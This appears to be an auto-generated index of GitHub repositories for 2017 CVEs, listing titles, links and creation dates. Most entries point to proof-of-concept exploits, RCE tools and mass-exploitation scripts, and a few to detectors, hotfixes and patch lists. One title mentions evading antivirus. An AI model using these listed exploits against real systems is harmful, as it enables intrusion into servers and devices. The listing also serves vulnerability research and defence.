**RTF Cleaner, tries to extract URL from malicious RTF samples using CVE-2017-0199 & CVE-2017-8759** : [jacobsoo/RTF-Cleaner](https://api.github.com/repos/jacobsoo/RTF-Cleaner) create time: 2017-12-08T09:45:25Z

**Struts2の脆弱性S2-045, S2-055 および Jackson の脆弱性 CVE-2017-7525, CVE-2017-15095 の調査報告** : [SecureSkyTechnology/study-struts2-s2-054_055-jackson-cve-2017-7525_cve-2017-15095](https://api.github.com/repos/SecureSkyTechnology/study-struts2-s2-054_055-jackson-cve-2017-7525_cve-2017-15095) create time: 2017-12-04T10:07:28Z

**CVE-2017-15944 Palo Alto Networks firewalls remote root code execution POC** : [xxnbyy/CVE-2017-15944-POC](https://api.github.com/repos/xxnbyy/CVE-2017-15944-POC) create time: 2017-12-19T04:43:24Z

**Apache synapse 反序列化 CVE–2017–15708** : [HuSoul/CVE-2017-15708](https://api.github.com/repos/HuSoul/CVE-2017-15708) create time: 2017-12-18T10:27:58Z

**CVE-2017-7525 S2-055 Exploit** : [Nazicc/S2-055](https://api.github.com/repos/Nazicc/S2-055) create time: 2017-12-19T01:02:04Z

**POCs for CVE-2017-13672 (OOB read in VGA Cirrus QEMU driver, causing DoS)** : [DavidBuchanan314/CVE-2017-13672](https://api.github.com/repos/DavidBuchanan314/CVE-2017-13672) create time: 2017-12-22T20:08:33Z

**CVE-2017-12149 JBOSS RCE (TESTED) ** : [1337g/CVE-2017-12149](https://api.github.com/repos/1337g/CVE-2017-12149) create time: 2017-12-22T07:30:29Z

**CVE-2017-10271 WEBLOGIC RCE (TESTED)** : [1337g/CVE-2017-10271](https://api.github.com/repos/1337g/CVE-2017-10271) create time: 2017-12-23T13:04:23Z

**Better Exploit Code For CVE 2017 9805 apache struts** : [chrisjd20/cve-2017-9805.py](https://api.github.com/repos/chrisjd20/cve-2017-9805.py) create time: 2017-12-04T18:23:53Z

**Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Security). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server.** : [s3xy/CVE-2017-10271](https://api.github.com/repos/s3xy/CVE-2017-10271) create time: 2017-12-25T06:11:54Z

**Simplified PoC for Weblogic-CVE-2017-10271** : [ZH3FENG/PoCs-Weblogic_2017_10271](https://api.github.com/repos/ZH3FENG/PoCs-Weblogic_2017_10271) create time: 2017-12-25T13:18:45Z

**CVE-2017-12615 Tomcat RCE (TESTED)** : [1337g/CVE-2017-12615](https://api.github.com/repos/1337g/CVE-2017-12615) create time: 2017-12-26T03:48:14Z

**Android Tethering Provisioning Check Bypass (CVE-2017-0554)** : [lanrat/tethr](https://api.github.com/repos/lanrat/tethr) create time: 2017-12-24T23:18:28Z

**CVE-2017-17562 GOAHEAD RCE (Author: Daniel Hodson)** : [1337g/CVE-2017-17562](https://api.github.com/repos/1337g/CVE-2017-17562) create time: 2017-12-27T05:46:50Z

**CVE-2017-8759** : [Lz1y/CVE-2017-8759](https://api.github.com/repos/Lz1y/CVE-2017-8759) create time: 2017-09-15T00:36:17Z

**None** : [xyzAsian/Janus-CVE-2017-13156](https://api.github.com/repos/xyzAsian/Janus-CVE-2017-13156) create time: 2017-12-29T07:11:42Z

**credit to artkond** : [1337g/CVE-2017-3881](https://api.github.com/repos/1337g/CVE-2017-3881) create time: 2018-01-02T01:45:15Z

**None** : [lr3800/CVE-2017-17692](https://api.github.com/repos/lr3800/CVE-2017-17692) create time: 2018-01-02T13:47:36Z

**forked from https://github.com/s3xy/CVE-2017-10271. Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Security). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server.Modified by hanc00l** : [cjjduck/weblogic_wls_wsat_rce](https://api.github.com/repos/cjjduck/weblogic_wls_wsat_rce) create time: 2018-01-03T06:14:28Z

**A proof-of-concept for CVE-2017-16997** : [Xiami2012/CVE-2017-16997-poc](https://api.github.com/repos/Xiami2012/CVE-2017-16997-poc) create time: 2018-01-03T09:31:55Z

**CVE-2017-17215 HuaWei Router RCE (NOT TESTED)** : [1337g/CVE-2017-17215](https://api.github.com/repos/1337g/CVE-2017-17215) create time: 2017-12-25T06:11:24Z

**None** : [ghhubin/weblogic_cve2017-20271](https://api.github.com/repos/ghhubin/weblogic_cve2017-20271) create time: 2017-12-29T07:48:10Z

**Spectre (CVE-2017-5753) (CVE-2017-5715). Not By Me. Collected from Book.** : [EdwardOwusuAdjei/Spectre-PoC](https://api.github.com/repos/EdwardOwusuAdjei/Spectre-PoC) create time: 2018-01-04T14:20:13Z

**2018年1月2日 (CVE-2017-5753 和 CVE-2017-5715) "幽灵" Spectre 漏洞利用** : [poilynx/spectre-attack-example](https://api.github.com/repos/poilynx/spectre-attack-example) create time: 2018-01-05T05:51:34Z

**Example of using revealed "Spectre" exploit (CVE-2017-5753 and CVE-2017-5715)** : [pedrolucasoliva/spectre-attack-demo](https://api.github.com/repos/pedrolucasoliva/spectre-attack-demo) create time: 2018-01-06T01:08:15Z

**Proof-of-concept / Exploit / checks whether system is affected by Variant 3: rogue data cache load (CVE-2017-5754), a.k.a ** : [speecyy/Am-I-affected-by-Meltdown](https://api.github.com/repos/speecyy/Am-I-affected-by-Meltdown) create time: 2018-01-06T03:16:33Z

**OSX 10.13.2, CVE-2017-5753, Spectre, PoC, C, ASM for OSX, MAC, Intel Arch, Proof of Concept, Hopper.App Output** : [albertleecn/cve-2017-5753](https://api.github.com/repos/albertleecn/cve-2017-5753) create time: 2018-01-07T02:46:38Z

**Simply diff for CVE-2017-0785** : [sigbitsadmin/diff](https://api.github.com/repos/sigbitsadmin/diff) create time: 2018-01-07T18:30:42Z

**Proof of Concept exploit for CVE-2017-8570** : [rxwx/CVE-2017-8570](https://api.github.com/repos/rxwx/CVE-2017-8570) create time: 2018-01-09T19:09:33Z

**Spectre exploit** : [opsxcq/exploit-cve-2017-5715](https://api.github.com/repos/opsxcq/exploit-cve-2017-5715) create time: 2018-01-09T05:06:12Z

**Example of using revealed "Spectre" exploit (CVE-2017-5753 and CVE-2017-5715)** : [Eugnis/spectre-attack](https://api.github.com/repos/Eugnis/spectre-attack) create time: 2018-01-04T00:28:50Z

**CVE-2017-10271 POC** : [Luffin/CVE-2017-10271](https://api.github.com/repos/Luffin/CVE-2017-10271) create time: 2017-12-28T07:19:13Z

**ION通用提权漏洞PoC以及分析** : [guoygang/CVE-2017-0564-ION-PoC](https://api.github.com/repos/guoygang/CVE-2017-0564-ION-PoC) create time: 2018-01-11T02:50:26Z

**PoC for CVE-2018-0802 And CVE-2017-11882** : [Ridter/RTF_11882_0802](https://api.github.com/repos/Ridter/RTF_11882_0802) create time: 2018-01-12T11:38:33Z

**An exploit for CVE-2017-5638 Remote Code Execution (RCE) Vulnerability in Apache Struts 2** : [SpiderMate/Stutsfi](https://api.github.com/repos/SpiderMate/Stutsfi) create time: 2017-05-28T03:48:10Z

**diff for CVE-2017-0785 (Blueborne)** : [SigBitsLabs/diff](https://api.github.com/repos/SigBitsLabs/diff) create time: 2018-01-14T19:36:03Z

**[CVE-2017-10235] Description and PoC of VirtualBox E1000 device Buffer Overflow** : [fundacion-sadosky/vbox_cve_2017_10235](https://api.github.com/repos/fundacion-sadosky/vbox_cve_2017_10235) create time: 2017-09-25T20:42:47Z

**Proof of concept of CVE-2017-0807** : [kpatsakis/PoC_CVE-2017-0807](https://api.github.com/repos/kpatsakis/PoC_CVE-2017-0807) create time: 2018-01-16T04:34:06Z

**None** : [likescam/CVE-2017-11882](https://api.github.com/repos/likescam/CVE-2017-11882) create time: 2018-01-16T05:47:47Z

**None** : [likescam/CVE-2018-0802_CVE-2017-11882](https://api.github.com/repos/likescam/CVE-2018-0802_CVE-2017-11882) create time: 2018-01-16T05:49:01Z

**mass exploit CVE - 2017-16894** : [LuanDevecchi/CVE201716894](https://api.github.com/repos/LuanDevecchi/CVE201716894) create time: 2018-01-17T14:24:04Z

**CVE-2017-7173: Local denial of service for iOS requiring root privileges.** : [bazad/sysctl_coalition_get_pid_list-dos](https://api.github.com/repos/bazad/sysctl_coalition_get_pid_list-dos) create time: 2017-09-22T04:04:05Z

**WebLogic wls-wsat RCE CVE-2017-10271** : [peterpeter228/Oracle-WebLogic-CVE-2017-10271](https://api.github.com/repos/peterpeter228/Oracle-WebLogic-CVE-2017-10271) create time: 2018-01-19T15:50:08Z

**The demo of the speculative execution attack Spectre (CVE-2017-5753, CVE-2017-5715).** : [ixtal23/spectreScope](https://api.github.com/repos/ixtal23/spectreScope) create time: 2018-01-06T18:27:03Z

**Javascript Web-Kit exploit. CVE-2017-7061. By Lokihardt from Google Project Zero** : [TheLoneHaxor/jailbreakme103](https://api.github.com/repos/TheLoneHaxor/jailbreakme103) create time: 2018-01-22T21:14:30Z

**Unquoted Path Service** : [lajarajorge/CVE-2017-1000475](https://api.github.com/repos/lajarajorge/CVE-2017-1000475) create time: 2018-01-22T21:10:22Z

**Security hotfix for CVE-2017-8802 ** : [ozzi-/Zimbra-CVE-2017-8802-Hotifx](https://api.github.com/repos/ozzi-/Zimbra-CVE-2017-8802-Hotifx) create time: 2018-01-23T14:56:18Z

**A POC chain exploit using the recent Cisco SMP exploit (CVE-2017-6736) to chain into Spectre (CVE-2017-5753 and CVE-2017-5715)** : [GarnetSunset/CiscoSpectreTakeover](https://api.github.com/repos/GarnetSunset/CiscoSpectreTakeover) create time: 2018-01-17T17:26:14Z

**Jackson 反序列化** : [maxbitcoin/Jackson-CVE-2017-17485](https://api.github.com/repos/maxbitcoin/Jackson-CVE-2017-17485) create time: 2018-03-01T16:09:20Z

**CVE-2017-7269利用代码(rb文件)** : [mirrorblack/CVE-2017-7269](https://api.github.com/repos/mirrorblack/CVE-2017-7269) create time: 2018-01-24T03:51:58Z

** the job is not yet finished** : [rockl/cve-2017-7184](https://api.github.com/repos/rockl/cve-2017-7184) create time: 2018-01-25T01:55:47Z

**not yet fin** : [rockl/cve-2017-7184-bak](https://api.github.com/repos/rockl/cve-2017-7184-bak) create time: 2018-01-25T02:10:45Z

**Oracle WebLogic WLS-WSAT Remote Code Execution Exploit (CVE-2017-10271)** : [kkirsche/CVE-2017-10271](https://api.github.com/repos/kkirsche/CVE-2017-10271) create time: 2018-01-05T21:57:03Z

**Naive shell script to verify Meltdown (CVE-2017-5754) patch status of EC2 instances** : [jdmulloy/meltdown-aws-scanner](https://api.github.com/repos/jdmulloy/meltdown-aws-scanner) create time: 2018-01-26T21:18:13Z

**Working POC for CVE 2017-5638** : [cafnet/apache-struts-v2-CVE-2017-5638](https://api.github.com/repos/cafnet/apache-struts-v2-CVE-2017-5638) create time: 2018-01-28T05:17:04Z

**CVE-2017-10797- User Enumeration in OwnCloud Server 8.1-10.0** : [n4xh4ck5/CVE-2017-10797](https://api.github.com/repos/n4xh4ck5/CVE-2017-10797) create time: 2018-01-29T11:53:14Z

**A quick-and-dirty tool to verify that userspace executables are immune to Spectre variant 2 (CVE-2017-5715).** : [dmo2118/retpoline-audit](https://api.github.com/repos/dmo2118/retpoline-audit) create time: 2018-01-18T06:55:53Z

**cve-2017-10271 POC** : [SuperHacker-liuan/cve-2017-10271-poc](https://api.github.com/repos/SuperHacker-liuan/cve-2017-10271-poc) create time: 2018-01-18T03:21:15Z

**PoC for wget v1.19.1** : [r1b/CVE-2017-13089](https://api.github.com/repos/r1b/CVE-2017-13089) create time: 2017-10-27T20:06:11Z

**CVE-2017-4878 Samples - http://blog.talosintelligence.com/2018/02/group-123-goes-wild.html** : [brianwrf/CVE-2017-4878-Samples](https://api.github.com/repos/brianwrf/CVE-2017-4878-Samples) create time: 2018-02-05T05:01:40Z

**CVE-2017-1635 PoC code** : [emcalv/tivoli-poc](https://api.github.com/repos/emcalv/tivoli-poc) create time: 2018-02-06T09:43:28Z

**PoC for Meltdown in linux (CVE-2017-5754)** : [zzado/Meltdown](https://api.github.com/repos/zzado/Meltdown) create time: 2018-01-18T16:32:50Z

**At this project, we made a python exploit using buffer overflow at the CVE-2017-7679** : [snknritr/CVE-2017-7679-in-python](https://api.github.com/repos/snknritr/CVE-2017-7679-in-python) create time: 2018-02-08T18:21:18Z

**Code put together from a few peoples ideas credit given don't use maliciously please** : [devcoinfet/CVE-2017-12617](https://api.github.com/repos/devcoinfet/CVE-2017-12617) create time: 2018-02-09T01:02:32Z

**Linux Kernel < 4.13.1 - BlueTooth Buffer Overflow (PoC) BlueBorne - Proof of Concept - Unarmed/Unweaponized - DoS (Crash) only** : [marcinguy/blueborne-CVE-2017-1000251](https://api.github.com/repos/marcinguy/blueborne-CVE-2017-1000251) create time: 2017-11-16T10:35:05Z

**Struts02 s2-045 exploit program** : [0x00-0x00/CVE-2017-5638](https://api.github.com/repos/0x00-0x00/CVE-2017-5638) create time: 2018-02-15T17:31:07Z

**Containerized exploitable PhpCollab** : [jlk/exploit-CVE-2017-6090](https://api.github.com/repos/jlk/exploit-CVE-2017-6090) create time: 2018-02-17T01:07:58Z

** Wordpress Username Enumeration /CVE-2017-5487,WordPress < 4.7.1 -** : [R3K1NG/wpUsersScan](https://api.github.com/repos/R3K1NG/wpUsersScan) create time: 2018-02-17T05:59:49Z

**This tool allows to check speculative execution side-channel attacks that affect many modern processors and operating systems designs. CVE-2017-5754 (Meltdown) and CVE-2017-5715 (Spectre) allows unprivileged processes to steal secrets from privileged processes. These attacks present 3 different ways of attacking data protection measures on CPUs enabling attackers to read data they shouldn't be able to. This tool is originally based on Microsoft: https://support.microsoft.com/en-us/help/4073119/protect-against-speculative-execution-side-channel-vulnerabilities-in ** : [Viralmaniar/In-Spectre-Meltdown](https://api.github.com/repos/Viralmaniar/In-Spectre-Meltdown) create time: 2018-01-05T09:43:04Z

**CVE-2017-10352 CVE-2017-10271 weblogic-XMLDecoder** : [bigsizeme/weblogic-XMLDecoder](https://api.github.com/repos/bigsizeme/weblogic-XMLDecoder) create time: 2018-02-18T01:40:33Z

**Multi-purpose proof-of-concept tool based on CPU-Z CVE-2017-15303** : [hfiref0x/Stryker](https://api.github.com/repos/hfiref0x/Stryker) create time: 2018-02-22T05:31:13Z

**None** : [MaxSecurity/Office-CVE-2017-8570](https://api.github.com/repos/MaxSecurity/Office-CVE-2017-8570) create time: 2018-02-26T04:41:24Z

**Meltdown Exploit / Proof-of-concept / checks whether system is affected by Variant 3: rogue data cache load (CVE-2017-5754), a.k.a MELTDOWN.** : [raphaelsc/Am-I-affected-by-Meltdown](https://api.github.com/repos/raphaelsc/Am-I-affected-by-Meltdown) create time: 2018-01-04T23:51:12Z

**None** : [ww9210/cve-2017-7374](https://api.github.com/repos/ww9210/cve-2017-7374) create time: 2018-02-27T21:22:01Z

**Scan/Exploit Blueborne CVE-2017-0785** : [pieterbork/blueborne](https://api.github.com/repos/pieterbork/blueborne) create time: 2017-10-04T20:41:12Z

**PoC Exploit for CVE-2018-0802 (and optionally CVE-2017-11882)** : [rxwx/CVE-2018-0802](https://api.github.com/repos/rxwx/CVE-2018-0802) create time: 2018-01-11T09:43:46Z

**cve-2017-10271** : [JackyTsuuuy/weblogic_wls_rce_poc-exp](https://api.github.com/repos/JackyTsuuuy/weblogic_wls_rce_poc-exp) create time: 2018-03-01T04:57:09Z

**Source code and configuration files related to our article in MISC96** : [Synacktiv-contrib/exploiting-cve-2017-5123](https://api.github.com/repos/Synacktiv-contrib/exploiting-cve-2017-5123) create time: 2018-03-01T11:03:08Z

**The Demo for CVE-2017-11427** : [CHYbeta/CVE-2017-11427-DEMO](https://api.github.com/repos/CHYbeta/CVE-2017-11427-DEMO) create time: 2018-03-03T00:29:22Z

**This is a sort of Java porting of the Python exploit at: https://www.exploit-db.com/exploits/41570/.** : [m3ssap0/struts2_cve-2017-5638](https://api.github.com/repos/m3ssap0/struts2_cve-2017-5638) create time: 2018-02-28T22:11:50Z

**None** : [Hurdano/CVE-CISCO-2017-15805](https://api.github.com/repos/Hurdano/CVE-CISCO-2017-15805) create time: 2018-03-12T10:50:34Z

**Exploitation Tool for CVE-2017-3066 targeting Adobe Coldfusion 11/12** : [codewhitesec/ColdFusionPwn](https://api.github.com/repos/codewhitesec/ColdFusionPwn) create time: 2018-03-12T16:44:12Z

**PoC for SpringBreak (CVE-2017-8046)** : [FixYourFace/SpringBreakPoC](https://api.github.com/repos/FixYourFace/SpringBreakPoC) create time: 2018-03-12T18:49:45Z

**Oracle WebLogic WLS-WSAT Remote Code Execution Exploit (CVE-2017-10271)** : [s0wr0b1ndef/Oracle-WebLogic-WLS-WSAT](https://api.github.com/repos/s0wr0b1ndef/Oracle-WebLogic-WLS-WSAT) create time: 2018-03-16T03:09:29Z

**None** : [likescam/CVE-2017-0213](https://api.github.com/repos/likescam/CVE-2017-0213) create time: 2018-03-19T04:04:05Z

**Linux Kernel Version 4.14 - 4.4 (Ubuntu && Debian)** : [C0dak/CVE-2017-16995](https://api.github.com/repos/C0dak/CVE-2017-16995) create time: 2018-03-19T11:58:20Z

**Golang exploit for CVE-2017-5638** : [Greynad/struts2-jakarta-inject](https://api.github.com/repos/Greynad/struts2-jakarta-inject) create time: 2018-03-14T12:04:34Z

**Apache Struts CVE-2017-5638 RCE exploitation** : [ggolawski/struts-rce](https://api.github.com/repos/ggolawski/struts-rce) create time: 2018-03-20T10:51:46Z

**A version of CVE-2017-0213 that I plan to use with an Empire stager** : [jbooz1/CVE-2017-0213](https://api.github.com/repos/jbooz1/CVE-2017-0213) create time: 2018-03-21T04:13:29Z

**None** : [likescam/CVE-2017-0199](https://api.github.com/repos/likescam/CVE-2017-0199) create time: 2018-03-22T08:40:55Z

**Writeup of CVE-2017-1002101 with sample "exploit"/escape** : [bgeesaman/subpath-exploit](https://api.github.com/repos/bgeesaman/subpath-exploit) create time: 2018-03-22T19:26:12Z

**None** : [lizhi16/CVE-2017-5638](https://api.github.com/repos/lizhi16/CVE-2017-5638) create time: 2017-09-28T08:43:21Z

**CVE-2017-14322 Interspire Email Marketer (emailmarketer) Exploit** : [joesmithjaffa/CVE-2017-14322](https://api.github.com/repos/joesmithjaffa/CVE-2017-14322) create time: 2018-03-27T13:20:31Z

**(https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11503** : [wizardafric/download](https://api.github.com/repos/wizardafric/download) create time: 2018-03-26T16:35:17Z

**a list of BIOS/Firmware fixes adressing CVE-2017-5715, CVE-2017-5753, CVE-2017-5754** : [mathse/meltdown-spectre-bios-list](https://api.github.com/repos/mathse/meltdown-spectre-bios-list) create time: 2018-01-14T11:52:38Z

**搭建漏洞利用测试环境** : [Zer0d0y/Samba-CVE-2017-7494](https://api.github.com/repos/Zer0d0y/Samba-CVE-2017-7494) create time: 2017-07-28T06:21:29Z

**tomcat7.x远程命令执行** : [Shellkeys/CVE-2017-12615](https://api.github.com/repos/Shellkeys/CVE-2017-12615) create time: 2018-04-01T15:22:51Z

**Android Blueborne RCE CVE-2017-0781** : [marcinguy/android712-blueborne](https://api.github.com/repos/marcinguy/android712-blueborne) create time: 2018-03-17T21:07:24Z

**CVE-2017-8570生成脚本(CVE-2017-0199另一种利用方式)** : [SwordSheath/CVE-2017-8570](https://api.github.com/repos/SwordSheath/CVE-2017-8570) create time: 2018-04-08T10:07:17Z

**Test and exploit for CVE-2017-12542** : [skelsec/CVE-2017-12542](https://api.github.com/repos/skelsec/CVE-2017-12542) create time: 2018-02-05T18:55:56Z

**This is a Java program that exploits Spring Break vulnerability (CVE-2017-8046).** : [jkutner/spring-break-cve-2017-8046](https://api.github.com/repos/jkutner/spring-break-cve-2017-8046) create time: 2018-04-16T16:54:05Z

**Fixed No Virus Manual Automatic Loader exe no zip because zip picks up the anti virus detector.** : [eonrickity/CVE-2017-0213](https://api.github.com/repos/eonrickity/CVE-2017-0213) create time: 2018-04-10T18:34:17Z

**None** : [xssfile/CVE-2017-8464-EXP](https://api.github.com/repos/xssfile/CVE-2017-8464-EXP) create time: 2018-04-20T09:01:03Z

**None** : [RavSS/Bluetooth-Crash-CVE-2017-0785](https://api.github.com/repos/RavSS/Bluetooth-Crash-CVE-2017-0785) create time: 2018-02-21T04:53:41Z

**None** : [bloomer1016/CVE-2017-11882-Possible-Remcos-Malspam](https://api.github.com/repos/bloomer1016/CVE-2017-11882-Possible-Remcos-Malspam) create time: 2018-04-23T03:07:25Z

**CVE-2017-16995(Ubuntu本地提权漏洞)** : [Al1ex/CVE-2017-16995](https://api.github.com/repos/Al1ex/CVE-2017-16995) create time: 2018-04-26T04:33:50Z

**CVE-2017-9506 - SSRF** : [random-robbie/Jira-Scan](https://api.github.com/repos/random-robbie/Jira-Scan) create time: 2018-04-25T11:25:18Z

**None** : [Al1ex/CVE-2017-7269](https://api.github.com/repos/Al1ex/CVE-2017-7269) create time: 2018-04-28T04:11:45Z

**Empire Port of CVE-2017-11882** : [ChaitanyaHaritash/CVE-2017-11882](https://api.github.com/repos/ChaitanyaHaritash/CVE-2017-11882) create time: 2018-05-04T17:50:57Z

**CVE-2017-0411 PoC refered p0** : [lulusudoku/PoC](https://api.github.com/repos/lulusudoku/PoC) create time: 2018-05-08T14:25:29Z

**CVE-2017-7494 C poc** : [incredible1yu/CVE-2017-7494](https://api.github.com/repos/incredible1yu/CVE-2017-7494) create time: 2018-05-10T08:12:31Z

**Apache Struts 2.3.5 < 2.3.31 / 2.5 < 2.5.10 - Remote Code Execution - Shell Script** : [win3zz/CVE-2017-5638](https://api.github.com/repos/win3zz/CVE-2017-5638) create time: 2018-05-13T16:13:26Z

**Windows: heap overflow in jscript.dll in Array.sort** : [AV1080p/CVE-2017-11907](https://api.github.com/repos/AV1080p/CVE-2017-11907) create time: 2018-05-16T05:42:39Z

**An exploit for Apache Struts CVE-2017-5638** : [mazen160/struts-pwn](https://api.github.com/repos/mazen160/struts-pwn) create time: 2017-03-12T02:02:25Z

**None** : [dangokyo/CVE_2017_16995](https://api.github.com/repos/dangokyo/CVE_2017_16995) create time: 2018-05-24T13:11:42Z

**ppsx file generator for cve-2017-8570 (based on bhdresh/cve-2017-8570)** : [temesgeny/ppsx-file-generator](https://api.github.com/repos/temesgeny/ppsx-file-generator) create time: 2017-07-24T18:35:26Z

**CVE-2017-0806 PoC (Android GateKeeperResponse writeToParcel/createFromParcel mismatch)** : [michalbednarski/ReparcelBug](https://api.github.com/repos/michalbednarski/ReparcelBug) create time: 2018-06-03T09:04:50Z

**POC for TP-Link Archer C9 - Admin Password Reset and RCE (CVE-2017-11519)** : [vakzz/tplink-CVE-2017-11519](https://api.github.com/repos/vakzz/tplink-CVE-2017-11519) create time: 2018-06-19T02:04:38Z

**CVE-2017-5792** : [scanfsec/HPE-iMC-7.3-RMI-Java-Deserialization](https://api.github.com/repos/scanfsec/HPE-iMC-7.3-RMI-Java-Deserialization) create time: 2018-06-20T06:08:47Z

**CVE-2017-7529_PoC** : [en0f/CVE-2017-7529_PoC](https://api.github.com/repos/en0f/CVE-2017-7529_PoC) create time: 2018-06-20T15:16:10Z

**Fork of github.com/spring-projects/spring-data-rest (vulnerable to CVE-2017-8046)** : [sj/spring-data-rest-CVE-2017-8046](https://api.github.com/repos/sj/spring-data-rest-CVE-2017-8046) create time: 2017-11-08T16:39:11Z

**None** : [leandrocamposcardoso/CVE-2017-5638-Mass-Exploit](https://api.github.com/repos/leandrocamposcardoso/CVE-2017-5638-Mass-Exploit) create time: 2018-06-24T22:40:54Z

**None** : [qy1202/https-github.com-Ridter-CVE-2017-11882-](https://api.github.com/repos/qy1202/https-github.com-Ridter-CVE-2017-11882-) create time: 2018-06-28T12:35:53Z

**Cisco iOS SNMP Overflow Exploit Toolkit (CVE-2017-6736)** : [GarnetSunset/CiscoIOSSNMPToolkit](https://api.github.com/repos/GarnetSunset/CiscoIOSSNMPToolkit) create time: 2018-01-22T21:15:43Z

**Joomla 1.7.3 - 3.7.2 CSRF exploit PoC** : [xyringe/CVE-2017-9934](https://api.github.com/repos/xyringe/CVE-2017-9934) create time: 2017-08-20T17:23:44Z

**None** : [lonehand/Oracle-WebLogic-CVE-2017-10271-master](https://api.github.com/repos/lonehand/Oracle-WebLogic-CVE-2017-10271-master) create time: 2018-07-06T08:32:28Z

**WebLogic Exploit** : [c0mmand3rOpSec/CVE-2017-10271](https://api.github.com/repos/c0mmand3rOpSec/CVE-2017-10271) create time: 2017-12-28T01:30:50Z

**None** : [likescam/CVE-2017-0541](https://api.github.com/repos/likescam/CVE-2017-0541) create time: 2018-07-17T16:00:57Z

**None** : [likescam/CVE-2017-0478](https://api.github.com/repos/likescam/CVE-2017-0478) create time: 2018-07-17T16:01:13Z

**None** : [dewankpant/CVE-2017-16568](https://api.github.com/repos/dewankpant/CVE-2017-16568) create time: 2018-01-21T03:17:56Z

**None** : [dewankpant/CVE-2017-16567](https://api.github.com/repos/dewankpant/CVE-2017-16567) create time: 2017-10-24T02:54:08Z

**Usbhijacking | CVE-2017-8464** : [X-Vector/usbhijacking](https://api.github.com/repos/X-Vector/usbhijacking) create time: 2017-10-03T18:18:28Z

**dnsmasq rop exploit with NX bypass** : [pupiles/bof-dnsmasq-cve-2017-14493](https://api.github.com/repos/pupiles/bof-dnsmasq-cve-2017-14493) create time: 2018-12-04T08:15:53Z

**on Mac 10.12.2** : [Peterpan0927/CVE-2017-2370](https://api.github.com/repos/Peterpan0927/CVE-2017-2370) create time: 2018-07-30T09:32:15Z

**A Burp extension to detect and exploit versions of Telerik Web UI vulnerable to CVE-2017-9248.** : [capt-meelo/Telewreck](https://api.github.com/repos/capt-meelo/Telewreck) create time: 2018-08-03T04:36:23Z

**st2-046-poc CVE-2017-5638** : [jas502n/st2-046-poc](https://api.github.com/repos/jas502n/st2-046-poc) create time: 2017-03-21T05:47:49Z

**CVE-2017-5693 Denial of service vulnerability in Puma 6 modems** : [TransLunarInjection/Puma6Fail](https://api.github.com/repos/TransLunarInjection/Puma6Fail) create time: 2017-04-25T21:25:43Z

**None** : [moayadalmalat/CVE-2017-12636](https://api.github.com/repos/moayadalmalat/CVE-2017-12636) create time: 2018-08-25T11:50:22Z

**None** : [beraphin/CVE-2017-8890](https://api.github.com/repos/beraphin/CVE-2017-8890) create time: 2017-07-09T06:03:37Z

**A full exploit of CVE-2017-3000 on Flash Player Constant Blinding PRNG** : [dangokyo/CVE-2017-3000](https://api.github.com/repos/dangokyo/CVE-2017-3000) create time: 2018-08-26T14:34:44Z

**Tiny script to enumerate users using CVE-2017-9554 (forget_passwd.cgi) ** : [rfcl/Synology-DiskStation-User-Enumeration-CVE-2017-9554-](https://api.github.com/repos/rfcl/Synology-DiskStation-User-Enumeration-CVE-2017-9554-) create time: 2018-08-28T05:13:59Z

**Strutsy - Mass exploitation of Apache Struts (CVE-2017-5638) vulnerability** : [tahmed11/strutsy](https://api.github.com/repos/tahmed11/strutsy) create time: 2017-04-09T08:57:08Z

**CVE-2017-10366: Oracle PeopleSoft 8.54, 8.55, 8.56 Java deserialization exploit** : [blazeinfosec/CVE-2017-10366_peoplesoft](https://api.github.com/repos/blazeinfosec/CVE-2017-10366_peoplesoft) create time: 2018-09-03T15:46:39Z

**Detects Windows and Linux systems with enabled Trusted Platform Modules (TPM) vulnerable to CVE-2017-15361. #nsacyber** : [nsacyber/Detect-CVE-2017-15361-TPM](https://api.github.com/repos/nsacyber/Detect-CVE-2017-15361-TPM) create time: 2017-10-19T20:02:56Z

**Exploit toolkit CVE-2017-8759 - v1.0 is a handy python script which provides pentesters and security researchers a quick and effective way to test Microsoft .NET Framework RCE. It could generate a malicious RTF file and deliver metasploit / meterpreter / other payload to victim without any complex configuration.** : [bhdresh/CVE-2017-8759](https://api.github.com/repos/bhdresh/CVE-2017-8759) create time: 2017-09-14T10:04:39Z

**Details about CVE-2017-6913 - Stored XSS in open-xchange's webmail** : [gquere/CVE-2017-6913](https://api.github.com/repos/gquere/CVE-2017-6913) create time: 2018-09-13T05:51:59Z

**None** : [MostafaSoliman/CVE-2017-6079-Blind-Command-Injection-In-Edgewater-Edgemarc-Devices-Exploit](https://api.github.com/repos/MostafaSoliman/CVE-2017-6079-Blind-Command-Injection-In-Edgewater-Edgemarc-Devices-Exploit) create time: 2018-09-22T19:18:47Z

**None** : [Voraka/cve-2017-8760](https://api.github.com/repos/Voraka/cve-2017-8760) create time: 2018-09-25T03:23:13Z

**None** : [bkhablenko/CVE-2017-8046](https://api.github.com/repos/bkhablenko/CVE-2017-8046) create time: 2018-09-26T11:11:40Z

**None** : [cscli/CVE-2017-5223](https://api.github.com/repos/cscli/CVE-2017-5223) create time: 2018-09-26T11:58:32Z

**None** : [lexfo/cve-2017-11176](https://api.github.com/repos/lexfo/cve-2017-11176) create time: 2018-10-02T08:06:04Z

**Commvault-CVE-2017-18044** : [securifera/CVE-2017-18044-Exploit](https://api.github.com/repos/securifera/CVE-2017-18044-Exploit) create time: 2018-10-02T19:18:31Z

**WARNING: This is a vulnerable application to test the exploit for the Spring Break vulnerability (CVE-2017-8046). Run it at your own risk!** : [m3ssap0/SpringBreakVulnerableApp](https://api.github.com/repos/m3ssap0/SpringBreakVulnerableApp) create time: 2018-03-08T15:29:44Z

**Source code for CVE-2017-16245 (Avecto Defendpoint bypass originally disclosed by Nettitude) ** : [AOCorsaire/CVE-2017-16245](https://api.github.com/repos/AOCorsaire/CVE-2017-16245) create time: 2018-10-16T08:14:29Z

